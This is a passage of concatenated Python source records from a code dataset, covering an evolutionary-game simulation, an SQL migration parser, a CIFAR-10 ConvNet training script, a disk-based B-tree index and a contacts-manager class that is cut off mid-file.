for i in range(n_it): # run the evolution process with n_it initializations\n        print(i)\n        (coop, freq) = evol_proc(qs, pi_round, beta, n_gen)\n        # print(coop.shape)\n        # print(coop)\n        # print(freq.shape)\n        # print(freq)\n        # get the average results of n_it initializations\n        coops = i / (i + 1) * coops + 1 / (i + 1) * coop\n        freqs = i / (i + 1) * freqs + 1 / (i + 1) * freq\n\n        # (coop, freq) = evol_proc(q1, pi_round, beta, n_gen)\n        # coop1 = i / (i + 1) * coop1 + 1 / (i + 1) * coop\n        # freq1 = i / (i + 1) * freq1 + 1 / (i + 1) * freq\n        #\n        # (coop, freq) = evol_proc(q2, pi_round, beta, n_gen)\n        # coop2 = i / (i + 1) * coop2 + 1 / (i + 1) * coop\n        # freq2 = i / (i + 1) * freq2 + 1 / (i + 1) * freq\n\n    coop = np.array([coops, coop1, coop2])\n    freq = np.array([freqs, freq1, freq2])\n    return (coop, freq)\n\n\ndef write_file(file_name, data_name):\n    f = open(file_name, 'w')\n    shape = data_name.shape\n    for i in range(shape[0]):\n        for j in range(shape[1]):\n            if j < (shape[1] - 1):\n                f.write(str(data_name[i][j]) + ',')\n            else:\n                f.write(str(data_name[i][j]))\n        f.write('\\n')\n    f.close()\n\n\nif __name__ == '__main__':\n    coop_re, freq_re = get_evol_data()\n    write_file('pri_coop_time.txt', coop_re)","sub_path":"stochastic_evolutionary_game/evolution_on_stochastic_game/pd_stochastic_game_new/get_evol_data.py","file_name":"get_evol_data.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"450456968","text":"from io import BytesIO, TextIOWrapper\n\nINFO = ''\nINFO_CHECK = False\nBEGIN_MIG = 'BEGIN MIGRATION'\nEND_MIG = 'END MIGRATION'\n\nsql_file = 'sample.SQL'\nmigration_sql = TextIOWrapper(\n    BytesIO(),\n    line_buffering=True,\n    encoding='utf-8',\n    )\n\nwith open(sql_file) as fil:\n    print(fil)\n    for line in fil:\n        if line.strip().upper() == BEGIN_MIG:\n            INFO_CHECK = True\n            continue\n        if line.strip().upper() == END_MIG:\n            INFO_CHECK = False\n            continue\n        if INFO_CHECK:\n            INFO = INFO + line.strip() + ' ||| '\n        else:\n            migration_sql.write(line)\n","sub_path":"python/str_parser.py","file_name":"str_parser.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"397361903","text":"\"\"\"\nThis module implements training and evaluation of a Convolutional Neural Network in PyTorch.\nYou should fill in code into indicated sections.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport numpy as np\nimport os\nfrom convnet_pytorch import ConvNet\nimport cifar10_utils\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.nn as nn\n\n# Default constants\nLEARNING_RATE_DEFAULT = 1e-4\nBATCH_SIZE_DEFAULT = 32\nMAX_STEPS_DEFAULT = 5000\nEVAL_FREQ_DEFAULT = 500\nOPTIMIZER_DEFAULT = 'ADAM'\n\n# Directory in which cifar data is saved\nDATA_DIR_DEFAULT = './cifar10/cifar-10-batches-py'\n\nFLAGS = None\n\n\ndef accuracy(predictions, targets):\n    \"\"\"\n    Computes the prediction accuracy, i.e. the average of correct predictions\n    of the network.\n    \n    Args:\n      predictions: 2D float array of size [batch_size, n_classes]\n      targets: 1D int array of size [batch_size] with the ground truth\n               class index for each sample in the batch\n    Returns:\n      accuracy: scalar float, the accuracy of predictions,\n                i.e. 
the average correct predictions over the whole batch\n \n TODO:\n Implement accuracy computation.\n \"\"\"\n \n class_preds = torch.argmax(predictions, dim=1)\n correct_preds = (class_preds == targets).sum()\n accuracy = correct_preds.item() / predictions.shape[0]\n \n return accuracy\n\ndef eval(model, dataset, batch_size, device):\n model.eval()\n\n total_images = 0\n total_accuracy = 0\n num_batches = 0\n while total_images < dataset.num_examples:\n images, labels = dataset.next_batch(batch_size)\n\n # Convert to torch Tensor\n images = torch.from_numpy(images).to(device)\n labels = torch.from_numpy(labels).to(device)\n\n preds = model.forward(images)\n batch_accuracy = accuracy(preds, labels)\n \n total_accuracy += batch_accuracy\n total_images += batch_size\n num_batches += 1\n \n return total_accuracy/num_batches\n\ndef train():\n \"\"\"\n Performs training and evaluation of ConvNet model.\n \n TODO:\n Implement training and evaluation of ConvNet model. Evaluate your model on the whole test set each eval_freq iterations.\n \"\"\"\n \n ### DO NOT CHANGE SEEDS!\n # Set the random seeds for reproducibility\n np.random.seed(42)\n torch.manual_seed(42)\n\n ########################\n device = torch.device(\"cpu\") if not torch.cuda.is_available() else torch.device(\"cuda:0\")\n print(\"Using device\", device)\n\n def set_seed(seed):\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available(): # GPU operation have separate seed\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n set_seed(42)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n cifar10 = cifar10_utils.get_cifar10(data_dir=FLAGS.data_dir, one_hot=False, validation_size=0)\n train = cifar10[\"train\"]\n valid = cifar10[\"validation\"]\n test = cifar10[\"test\"]\n\n losses = []\n test_accuracies = []\n train_accuracies = []\n\n model = ConvNet(3, 10).to(device)\n loss_module = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=FLAGS.learning_rate)\n \n step = 0 \n while step < FLAGS.max_steps:\n if step % FLAGS.eval_freq == 0: # Evaluate the model on the test dataset\n test_accuracy = eval(model, test, 100, device)\n test_accuracies.append(test_accuracy)\n print(f\"STEP {step} - {test_accuracy}\")\n \n model.train()\n images, labels = train.next_batch(FLAGS.batch_size)\n\n # Convert to torch Tensor\n images = torch.from_numpy(images).to(device)\n labels = torch.from_numpy(labels).to(device)\n\n preds = model(images)\n train_accuracies.append(accuracy(preds, labels))\n\n loss = loss_module(preds, labels)\n losses.append(loss.item())\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n step += 1\n \n test_accuracy = eval(model, test, 100, device)\n test_accuracies.append(test_accuracy)\n print(f\"STEP {step} - {test_accuracy}\")\n \n def moving_average(a, n=3):\n # Taken from https://stackoverflow.com/questions/14313510/how-to-calculate-moving-average-using-numpy\n ret = np.cumsum(a, dtype=float)\n ret[n:] = ret[n:] - ret[:-n]\n return ret[n - 1:] / n\n \n train_accuracies = moving_average(train_accuracies, n=100)\n\n fig, ax1 = plt.subplots()\n\n ax1.set_xlabel('Training iteration')\n ax1.set_ylabel('Loss')\n l1 = ax1.plot(range(len(losses)), losses, label=\"training loss\", color=\"b\", alpha=0.5, linewidth=1)\n\n ax2 = ax1.twinx()\n ax2.set_ylabel('Accuracy')\n l2 = ax2.plot(np.linspace(0, len(losses), len(test_accuracies)), test_accuracies, label=\"test accuracy\", color=\"r\")\n l3 = ax2.plot(np.linspace(0, 
len(losses), len(train_accuracies)), train_accuracies, label=\"train accuracy\", color=\"b\")\n\n    plots = l1+l2+l3\n    labels = [plot.get_label() for plot in plots]\n    ax2.legend(plots, labels)\n\n    plt.savefig(os.path.join(\"images\", \"cnn_loss_accuracy.png\"))\n    plt.show()\n\n\ndef print_flags():\n    \"\"\"\n    Prints all entries in FLAGS variable.\n    \"\"\"\n    for key, value in vars(FLAGS).items():\n        print(key + ' : ' + str(value))\n\n\ndef main():\n    \"\"\"\n    Main function\n    \"\"\"\n    # Print all Flags to confirm parameter settings\n    print_flags()\n    \n    if not os.path.exists(FLAGS.data_dir):\n        os.makedirs(FLAGS.data_dir)\n    \n    # Run the training operation\n    train()\n\n\nif __name__ == '__main__':\n    # Command line arguments\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--learning_rate', type=float, default=LEARNING_RATE_DEFAULT,\n                        help='Learning rate')\n    parser.add_argument('--max_steps', type=int, default=MAX_STEPS_DEFAULT,\n                        help='Number of steps to run trainer.')\n    parser.add_argument('--batch_size', type=int, default=BATCH_SIZE_DEFAULT,\n                        help='Batch size to run trainer.')\n    parser.add_argument('--eval_freq', type=int, default=EVAL_FREQ_DEFAULT,\n                        help='Frequency of evaluation on the test set')\n    parser.add_argument('--data_dir', type=str, default=DATA_DIR_DEFAULT,\n                        help='Directory for storing input data')\n    FLAGS, unparsed = parser.parse_known_args()\n    \n    main()\n","sub_path":"assignment_1/1_mlp_cnn/code/train_convnet_pytorch.py","file_name":"train_convnet_pytorch.py","file_ext":"py","file_size_in_byte":6577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"467243869","text":"import colors\nfrom operator import attrgetter\n\nTAMANHO_REGISTRO = 1506\nTAMANHO_BLOCO = 4096\n\nORDEM_PRIM = 170\nORDEM_SEC = 12\n\nclass Chave():\n\n    def __init__(self, chave, ponteiro, ponteiro_no_menor = 0):\n        self.chave = chave\n        self.ponteiro_arquivo = int(ponteiro) # Posição do bloco no hash_table.data que contém a self.chave\n        self.ponteiro_no_menor = int(ponteiro_no_menor) # Posição do bloco onde está o nó que contém chaves menor que a\n                                                        # self.chave\n\n    '''Gets & Sets'''\n    def get_chave(self):\n        return self.chave\n\n    def get_ponteiro_arquivo(self):\n        return self.ponteiro_arquivo\n\n    def get_ponteiro_no_menor(self):\n        return self.ponteiro_no_menor\n    def set_ponteiro_no_menor(self, posicao):\n        self.ponteiro_no_menor = int(posicao)\n\nclass No ():\n\n    def __init__(self):\n        self.qtd_chaves = int(0)\n        self.chaves = []\n        self.ponteiro_no_maior = int(0) # Posição do bloco onde está o nó que contém chaves maior que a\n                                        # self.chave.\n        '''Sabemos que a quantidade de ponteiros para bloco em um No é a quantidade de chaves + 1. Como cada chave é\n        responsável por mapear o No com chaves menores que ele, o ponteiro que fica faltando é para o No cujas chaves \n        são maiores que a maior chave contida nesse No.'''\n\n        self.ponteiro_pai = int(0) # Posição do bloco cujo No é pai do No atual\n        ''' Não é comum fazer isso, mas vai simplificar muito na hora de fazer split. 
Não atrapalha também, pois são\n apenas 4 bytes no final para escrever e existe espaço para isso em ambas as árvores que estamos implementando.'''\n\n '''Gets & Sets'''\n def get_qtd_chaves(self):\n return self.qtd_chaves\n def set_qtd_chaves(self, qtd):\n self.qtd_chaves = qtd\n\n def get_qtd_max(self):\n return self.qtd_max\n def set_qtd_max(self, qtd):\n self.qtd_max = qtd\n\n def get_chaves(self):\n return self.chaves\n def limpa_chaves(self):\n self.chaves.clear()\n self.set_qtd_chaves(0)\n\n def insere_chave(self, chave):\n self.chaves.append(chave)\n self.qtd_chaves += 1\n self.chaves.sort(key=attrgetter(\"chave\"))\n\n def get_ponteiro_no_maior(self):\n return self.ponteiro_no_maior\n def set_ponteiro_no_maior(self, posicao):\n self.ponteiro_no_maior = int(posicao)\n\n def get_ponteiro_pai(self):\n return self.ponteiro_pai\n def set_ponteiro_pai(self, ponteiro):\n self.ponteiro_pai = ponteiro\n\n def get_chave_bytes(self):\n return self.tamanho_chave_bytes\n def set_chave_bytes(self, tamanho):\n self.tamanho_chave_bytes = tamanho\n\n\n def escreve_no (self, arquivo, qtd, tam):\n qtd_chaves_bin = int(self.qtd_chaves).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(qtd_chaves_bin)\n\n ponteiro_no_maior_bin = int(self.ponteiro_no_maior).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(ponteiro_no_maior_bin)\n\n ponteiro_pai_bin = int(self.ponteiro_pai).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(ponteiro_pai_bin)\n\n for j in range(qtd):\n if (j + 1) <= self.qtd_chaves:\n if tam > 4:\n titulo = self.chaves[j].chave.ljust(300, '\\x00')\n titulo = titulo.encode()\n titulo = titulo[:300]\n arquivo.write(titulo)\n else:\n aux = int(self.chaves[j].chave).to_bytes(tam, byteorder=\"big\", signed=True)\n arquivo.write(aux)\n\n aux = int(self.chaves[j].ponteiro_arquivo).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(aux)\n aux = int(self.chaves[j].ponteiro_no_menor).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(aux)\n\n else:\n nada = int(0).to_bytes(tam, byteorder=\"big\", signed=True)\n arquivo.write(nada)\n nada = int(0).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(nada)\n nada = int(0).to_bytes(4, byteorder=\"big\", signed=True)\n arquivo.write(nada)\n\n def le_no (self, qtd, tam, arquivo):\n no = No()\n\n qtd_chaves_bin = arquivo.read(4)\n qtd_chaves = int.from_bytes(qtd_chaves_bin, byteorder='big')\n no.set_qtd_chaves(qtd_chaves)\n\n ponteiro_no_maior_bin = arquivo.read(4)\n ponteiro = int.from_bytes(ponteiro_no_maior_bin, byteorder='big')\n no.set_ponteiro_no_maior(ponteiro)\n\n ponteiro_pai_bin = arquivo.read(4)\n ponteiro = int.from_bytes(ponteiro_pai_bin, byteorder='big')\n no.set_ponteiro_pai(ponteiro)\n\n for j in range(qtd_chaves):\n c = []\n if tam > 4:\n titulo = arquivo.read(tam)\n titulo = titulo.strip(b'\\x00')\n c.append(titulo)\n else:\n a = arquivo.read(tam)\n c.append(int.from_bytes(a, byteorder='big'))\n\n a = arquivo.read(4)\n c.append(int.from_bytes(a, byteorder='big'))\n\n a = arquivo.read(4)\n c.append(int.from_bytes(a, byteorder='big'))\n\n chave = Chave(c[0], c[1], c[2])\n no.chaves.append(chave)\n no.chaves.sort(key=attrgetter(\"chave\"))\n\n for i in range(no.qtd_chaves, qtd):\n t = tam +8\n nada = arquivo.read(t)\n\n return no\n\n\nclass ArvoreB ():\n\n def __init__(self, qtd_chaves_bloco):\n self.qtd_chaves_bloco = int(qtd_chaves_bloco)\n self.no_raiz = int(4096)\n\n def get_no_raiz (self):\n return self.no_raiz\n def set_no_raiz (self, no_raiz):\n self.no_raiz = int(no_raiz)\n\n 
def escreve_arvore(self, arquivo, qtd, tam):\n arvore_bin = [\n int(self.qtd_chaves_bloco).to_bytes(4, byteorder=\"big\", signed=True),\n int(self.no_raiz).to_bytes(4, byteorder=\"big\", signed=True)\n ]\n for a in arvore_bin: arquivo.write(a)\n\n arquivo.seek(4096, 0)\n no = No()\n no.escreve_no(arquivo, qtd, tam)\n\n def le_arvore(self, arquivo):\n linha = arquivo.read(8)\n aux1 = int.from_bytes(linha[:4], byteorder='big')\n aux2 = int.from_bytes(linha[4:], byteorder='big')\n arvore = ArvoreB(aux1)\n arvore.set_no_raiz(aux2)\n return arvore\n\ndef busca_id (chave, raiz, arquivo, hash, qtdblocos, qtd, tam):\n no = No()\n\n ponteiro = raiz\n arquivo.seek(ponteiro)\n no_aux = no.le_no(qtd, tam, arquivo)\n\n for i in range(no_aux.qtd_chaves):\n if chave == no_aux.chaves[i].chave:\n print(\"\\nChave \" + str(no_aux.chaves[i].chave) + \" já se encontra na árvore.\\n\")\n ponteiro_hash = no_aux.chaves[i].ponteiro_arquivo\n hash.seek(ponteiro_hash)\n r = hash.read(3012)\n registros = [r[:1506], r[1506:]]\n for registro in registros:\n id = int.from_bytes(registro[:4], byteorder='big')\n if id == chave:\n print(str(colors.darkgrey), end='')\n print('Id:', int.from_bytes(registro[:4], byteorder='big'))\n print('Titulo:', registro[4:304].decode().replace('\\x00', ''))\n print('Ano:', int.from_bytes(registro[304:308], byteorder='big'))\n print('Autores:', registro[308:458].decode().replace('\\x00', ''))\n print(\"Citações:\", int.from_bytes(registro[458:462], byteorder='big'))\n print(\"Data/Hora\", registro[462:482].decode().replace('\\x00', ''))\n print(\"Spinnet:\", registro[482:1506].decode().replace('\\x00', ''))\n print(str(colors.reset))\n print('\\n')\n print('Número de blocos lidos: ', qtdblocos)\n return\n\n for i in range(no_aux.qtd_chaves):\n if chave < no_aux.chaves[i].chave:\n if no_aux.chaves[i].ponteiro_no_menor == 0:\n print(\"\\nChave \" + str(chave) + \" não encontrada nesta árvore.\\n\")\n return False\n else:\n qtdblocos+=1\n return busca_id (chave, no_aux.chaves[i].ponteiro_no_menor, arquivo, hash, qtdblocos, qtd, tam)\n qtdblocos += 1\n return busca_id (chave, no_aux.ponteiro_no_maior, arquivo, hash, qtdblocos, qtd, tam)\n\ndef busca_titulo(chave, raiz, arquivo, hash, qtdblocos, qtd, tam):\n no = No()\n\n ponteiro = raiz\n arquivo.seek(ponteiro, 0)\n no_aux = no.le_no(qtd, tam, arquivo)\n\n for i in range(no_aux.qtd_chaves):\n if chave == no_aux.chaves[i].chave:\n print(\"\\nChave \" + str(no_aux.chaves[i].chave) + \" já se encontra na árvore.\\n\")\n ponteiro_hash = no_aux.chaves[i].ponteiro_arquivo * 4096\n hash.seek(ponteiro_hash)\n r = hash.read(3012)\n registros = [r[:1506], r[1506:]]\n for registro in registros:\n titulo = registro[4:304].strip(b'\\x00')\n\n if titulo == chave:\n print(str(colors.darkgrey), end='')\n print('Id:', int.from_bytes(registro[:4], byteorder='big'))\n print('Titulo:', registro[4:304].decode().replace('\\x00', ''))\n print('Ano:', int.from_bytes(registro[304:308], byteorder='big'))\n print('Autores:', registro[308:458].decode().replace('\\x00', ''))\n print(\"Citações:\", int.from_bytes(registro[458:462], byteorder='big'))\n print(\"Data/Hora\", registro[462:482].decode().replace('\\x00', ''))\n print(\"Spinnet:\", registro[482:1506].decode().replace('\\x00', ''))\n print(str(colors.reset))\n print('\\n')\n print('Número de blocos lidos: ', qtdblocos)\n return\n\n for i in range(no_aux.qtd_chaves):\n if chave < no_aux.chaves[i].chave:\n if no_aux.chaves[i].ponteiro_no_menor == 0:\n print(\"\\nChave \" + str(chave) + \" não encontrada nesta 
árvore.\\n\")\n return False\n else:\n qtdblocos+=1\n busca_titulo (chave, no_aux.chaves[i].ponteiro_no_menor, arquivo, hash, qtdblocos, qtd, tam)\n return\n qtdblocos += 1\n busca_titulo (chave, no_aux.ponteiro_no_maior, arquivo, hash, qtdblocos, qtd, tam)\n return\n\ndef split(no, ponteiro, arquivo, qtd, tam):\n chave_aux = None\n no_aux1 = No()\n no_aux2 = No()\n no_aux3 = No()\n\n if ponteiro == 4096:\n #resolver caso do no raiz\n for i in range(no.qtd_chaves):\n if i < (qtd) // 2:\n no_aux2.insere_chave(no.chaves[i])\n if i == (qtd) // 2:\n chave_aux = no.chaves[i]\n if i > (qtd) // 2:\n no_aux3.insere_chave(no.chaves[i])\n\n pos = arquivo.seek(0, 2)\n pos += 4\n chave_aux.set_ponteiro_no_menor(pos)\n\n arquivo.seek(pos)\n no_aux2.set_ponteiro_pai(ponteiro)\n no_aux2.escreve_no(arquivo, qtd, tam)\n\n pos = arquivo.seek(0, 2)\n pos += 4\n no_aux1.set_ponteiro_no_maior(pos)\n\n arquivo.seek(pos)\n no_aux3.set_ponteiro_pai(ponteiro)\n no_aux3.escreve_no(arquivo, qtd, tam)\n\n arquivo.seek(ponteiro)\n no_aux1.insere_chave(chave_aux)\n no_aux1.escreve_no(arquivo, qtd, tam)\n # print('Chave inserida na árvore com sucesso. SPLIIIIIIIIIITTTT')\n return\n\n for i in range(no.qtd_chaves):\n if i < (qtd) // 2:\n no_aux2.insere_chave(no.chaves[i])\n if i == (qtd) // 2:\n chave_aux = no.chaves[i]\n if i > (qtd) // 2:\n no_aux3.insere_chave(no.chaves[i])\n\n pos = arquivo.seek(ponteiro)\n chave_aux.set_ponteiro_no_menor(pos)\n no_aux2.set_ponteiro_pai(no.ponteiro_pai)\n no_aux2.escreve_no(arquivo, qtd, tam)\n\n arquivo.seek(0, 2)\n no_aux3.set_ponteiro_pai(no.ponteiro_pai)\n no_aux3.escreve_no(arquivo, qtd, tam)\n\n arquivo.seek(no.ponteiro_pai)\n no_aux1 = no_aux1.le_no(qtd, tam, arquivo)\n no_aux1.insere_chave(chave_aux)\n\n if no_aux1.qtd_chaves == qtd:\n split(no_aux1, no.ponteiro_pai, arquivo, qtd, tam)\n return\n else:\n arquivo.seek(no.ponteiro_pai)\n no_aux1.escreve_no(arquivo, qtd, tam)\n # print('Chave inserida na árvore com sucesso. 
SPLIIIIIIIIIITTTT')\n return\n\ndef insere (chave, raiz, arquivo, qtd, tam):\n no = No()\n ponteiro = raiz\n arquivo.seek(ponteiro)\n no_aux = no.le_no(qtd, tam, arquivo)\n\n if no_aux.qtd_chaves == 0:\n no_aux.insere_chave(chave)\n arquivo.seek(ponteiro)\n no_aux.escreve_no(arquivo, qtd, tam)\n # print('Chave inserida na árvore com sucesso.')\n return\n\n\n for i in range(0, no_aux.qtd_chaves):\n if chave.chave == no_aux.chaves[i].chave:\n # print('Chave já está na árvore.')\n return\n if chave.chave < no_aux.chaves[i].chave:\n if no_aux.chaves[i].ponteiro_no_menor == 0:\n no_aux.insere_chave(chave)\n if no_aux.qtd_chaves < qtd:\n arquivo.seek(ponteiro)\n no_aux.escreve_no(arquivo, qtd, tam)\n # print('Chave inserida na árvore com sucesso.')\n return\n else:\n split(no_aux, ponteiro, arquivo, qtd, tam)\n return\n\n else:\n ponteiro = no_aux.chaves[i].ponteiro_no_menor\n insere(chave, ponteiro, arquivo, qtd, tam)\n return\n\n if chave.chave > no_aux.chaves[no_aux.qtd_chaves - 1].chave:\n if no_aux.ponteiro_no_maior == 0:\n no_aux.insere_chave(chave)\n if no_aux.qtd_chaves < qtd:\n arquivo.seek(ponteiro)\n no_aux.escreve_no(arquivo, qtd, tam)\n # print('Chave inserida na árvore com sucesso.')\n else:\n split(no_aux, ponteiro, arquivo, qtd, tam)\n return\n else:\n ponteiro = no_aux.ponteiro_no_maior\n insere(chave, ponteiro, arquivo, qtd, tam)\n return\n\n\ndef vetor_indices ():\n hash_table = open('hash_table.data', 'rb')\n\n primaria = []\n secundaria = []\n\n bloco = True\n indice = 0\n num_registros = 0\n\n while bloco:\n bloco = hash_table.read(TAMANHO_BLOCO)\n # print(bloco)\n\n if bloco.count(b'\\x00') == TAMANHO_BLOCO:\n indice += 1\n else:\n registro1 = bloco[:TAMANHO_REGISTRO]\n # print(registro1)\n # i = input()\n chaveP = int.from_bytes(registro1[:4], byteorder='big')\n chaveS = registro1[4:304].decode().replace('\\x00', '')\n # print(chaveP, indice, chaveS)\n # i = input()\n # print((chaveP))\n if chaveP != 6711661:\n primaria.append( (chaveP , indice) )\n secundaria.append( (chaveS , indice) )\n # print(primaria, secundaria)\n # i = input()\n num_registros += 1\n else:\n hash_table.close()\n return primaria, secundaria\n\n registro2 = bloco[TAMANHO_REGISTRO : TAMANHO_REGISTRO+TAMANHO_REGISTRO]\n # print(registro2)\n # i = input()\n if not registro2.count(b'\\x00') == TAMANHO_REGISTRO:\n # if not registro2[:4] == b'\\x00\\x00\\x00\\x00' and not registro2[:4] == '':\n chaveP = int.from_bytes(registro2[:4], byteorder='big')\n chaveS = registro2[4:304].decode().replace('\\x00', '')\n # print(chaveS, chaveP)\n # i = input()\n primaria.append((chaveP, indice))\n secundaria.append((chaveS, indice))\n # print(primaria, secundaria)\n # i = input()\n num_registros += 1\n\n # a = input()\n # if indice == 999999:\n # break\n indice += 1\n\ndef main():\n a = vetor_indices()\n\n arvorePrimaria = ArvoreB(340)\n arvoreSecundaria = ArvoreB(24)\n arvP = open('arvore_indice_primario.data', 'wb+')\n arvS = open('arvore_indice_secundario.data', 'wb+')\n arvorePrimaria.escreve_arvore(arvP, arvorePrimaria.qtd_chaves_bloco, 4)\n arvoreSecundaria.escreve_arvore(arvS, arvoreSecundaria.qtd_chaves_bloco, 300)\n\n\n for c in a[0]:\n chave = Chave(c[0], c[1])\n insere(chave, arvorePrimaria.get_no_raiz(), arvP, arvorePrimaria.qtd_chaves_bloco, 4)\n\n for c in a[1]:\n chave = Chave(c[0], c[1])\n insere(chave, arvoreSecundaria.get_no_raiz(), arvS, arvoreSecundaria.qtd_chaves_bloco, 300)\n\ndef consulta_titulo ():\n arv = open('arvore_indice_secundario.data', 'rb')\n hash = open('hash_table.data', 'rb')\n busca 
= input()\n    busca = busca.encode()\n    busca_titulo(busca, 4096, arv, hash, 0, 24, 300)\n    hash.close()\n    arv.close()\n\ndef consulta_id ():\n    arv = open('arvore_indice_primario.data', 'rb')\n    hash = open('hash_table.data', 'rb')\n    busca = input()\n    busca = int(busca)\n    busca_id(busca, 4096, arv, hash, 0, 340, 4)\n    hash.close()\n    arv.close()","sub_path":"arvore.py","file_name":"arvore.py","file_ext":"py","file_size_in_byte":17410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"114167924","text":"\"\"\"\nID:303893416\nFull Name : Yigal.O\n\"\"\"\n\nimport re # to check correct email pattern\n\n# you can see that i somehow get regex at least for this part\n# example shows: itzik@Cohen-Dev.co.il i.e. we have the '-' between '@' and '.'\n# so one of the following should be appropriate\n# global_p = re.compile('[a-zA-Z0-9]+@[a-zA-Z]+\\.[a-zA-Z]+')\nglobal_p = re.compile('.*@.*\\..*')\n\n\nclass Contacts:\n    def __init__(self, olderContact=None):\n        self.CopyAttributes(olderContact)\n        self.ReadValues()\n\n    def CopyAttributes(self, olderContact=None):\n        if olderContact:\n            if isinstance(olderContact, Contacts):\n                self.name = olderContact.name\n                if hasattr(olderContact, \"cellphone\"):\n                    self.cellphone = olderContact.cellphone\n\n    def ReadValues(self):\n        inputVal = None\n        while True:\n            if hasattr(self, \"name\"):\n                oldAttr = self.name\n                inputVal = input(\"Name({0}):\".format(oldAttr))\n                if inputVal == '':\n                    self.name = oldAttr\n                    break\n                else:\n                    self.name = inputVal\n                    break\n            else:\n                inputVal = input(\"Name:\")\n                if inputVal == '':\n                    print(\"#\\nMyError: Name can't be empty#\\nTry again pls...\\n#\")\n                else:\n                    self.name = inputVal\n                    break\n        while True:\n            if hasattr(self, \"cellphone\"):\n                oldAttr = self.cellphone\n                inputVal = input(\"Cell Phone({0}):\".format(oldAttr))\n                if inputVal == '':\n                    self.cellphone = oldAttr\n                    break\n                elif inputVal == 'x':\n                    del self.cellphone\n                    break\n                elif not inputVal.isdigit():\n                    print(\"#\\nMyError: Cell Phone should contain digits only#\\nTry again pls...\\n#\")\n                else:\n                    self.cellphone = inputVal\n                    break\n            else:\n                inputVal = input(\"Cell Phone:\")\n                if inputVal == '':\n                    break\n                elif not inputVal.isdigit():\n                    print(\"#\\nMyError: Cell Phone should contain digits only#\\nTry again pls...\\n#\")\n                else:\n                    self.cellphone = inputVal\n                    break\n\n    def GetMyAttrStrs(self):\n        # assumption all inputs(i.e. 
instance variables) are strings! In other cases, if they come up, we should add conditions.\n        # a list comprehension would also work for the following, but it is not as clear..\n        myAttrList = []\n        for s in dir(self):\n            if not s.startswith('__'):\n                attr = self.__getattribute__(s)\n                if isinstance(attr, str):\n                    myAttrList.append(s)\n        return myAttrList\n\n    def Match(self, dataStr):\n        local_p = re.compile(dataStr)\n        my_Attr_str_list = self.GetMyAttrStrs()\n        for attr_str in my_Attr_str_list:\n            m = local_p.search(self.__getattribute__(attr_str))\n            if m:\n                return True\n        return False\n\n    def __lt__(self, other):\n        if self.name < other.name:\n            return True\n        else:\n            return False\n\n    def __str__(self):\n        myStr = \"Name: \" + self.name\n        if hasattr(self, \"cellphone\"):\n            myStr += \", Cell Phone: \" + self.cellphone\n        return myStr\n\n\nclass FriendContact(Contacts):\n    def __init__(self, olderContact=None):\n        self.CopyAttributes(olderContact)\n        self.ReadValues()\n\n    def CopyAttributes(self, olderContact=None):\n        super().CopyAttributes(olderContact)\n        if olderContact:\n            if isinstance(olderContact, FriendContact):\n                if hasattr(olderContact, \"homePhone\"):\n                    self.homePhone = olderContact.homePhone\n                if hasattr(olderContact, \"personalEmail\"):\n                    self.personalEmail = olderContact.personalEmail\n\n    def ReadValues(self):\n        super().ReadValues() # the MRO call from here as i understood from Ronen\n        inputVal = None\n        while True:\n            if hasattr(self, \"homePhone\"):\n                oldAttr = self.homePhone\n                inputVal = input(\"Home Phone({0}):\".format(oldAttr))\n                if inputVal == '':\n                    self.homePhone = oldAttr\n                    break\n                elif inputVal == 'x':\n                    del self.homePhone\n                    break\n                elif not inputVal.isdigit():\n                    print(\"#\\nMyError: Home Phone should contain digits only#\\nTry again pls...\\n#\")\n                else:\n                    self.homePhone = inputVal\n                    break\n            else:\n                inputVal = input(\"Home Phone:\")\n                if inputVal == '':\n                    break\n                elif not inputVal.isdigit():\n                    print(\"#\\nMyError: Home Phone should contain digits only#\\nTry again pls...\\n#\")\n                else:\n                    self.homePhone = inputVal\n                    break\n        while True:\n            if hasattr(self, \"personalEmail\"):\n                oldAttr = self.personalEmail\n                inputVal = input(\"Personal Email({0}):\".format(oldAttr))\n                if inputVal == '':\n                    self.personalEmail = oldAttr\n                    break\n                elif inputVal == 'x':\n                    del self.personalEmail\n                    break\n                elif global_p.match(inputVal) == None:\n                    print(\"#\\nMyError: Personal Email format is incorrect#\\nTry again pls...\\n#\")\n                else:\n                    self.personalEmail = inputVal\n                    break\n            else:\n                inputVal = input(\"Personal Email:\")\n                if inputVal == '':\n                    break\n                elif global_p.match(inputVal) == None:\n                    print(\"#\\nMyError: Personal Email format is incorrect#\\nTry again pls...\\n#\")\n                else:\n                    self.personalEmail = inputVal\n                    break\n\n    def GetMyStr(self):\n        myStr = \"\"\n        if hasattr(self, \"homePhone\"):\n            myStr += \"Home Phone: \" + self.homePhone\n            if hasattr(self, \"personalEmail\"):\n                myStr += \", Personal Email: \" + self.personalEmail\n        elif hasattr(self, \"personalEmail\"):\n            myStr += \"Personal Email: \" + self.personalEmail\n        return myStr\n\n    def __str__(self):\n        return Contacts.__str__(self) + \", \" + self.GetMyStr()\n\n\nclass ProfessionalContact(Contacts):\n    def __init__(self, olderContact=None):\n        self.CopyAttributes(olderContact)\n        self.ReadValues()\n\n    def CopyAttributes(self, olderContact=None):\n        super().CopyAttributes(olderContact)\n        if olderContact:\n            if isinstance(olderContact, 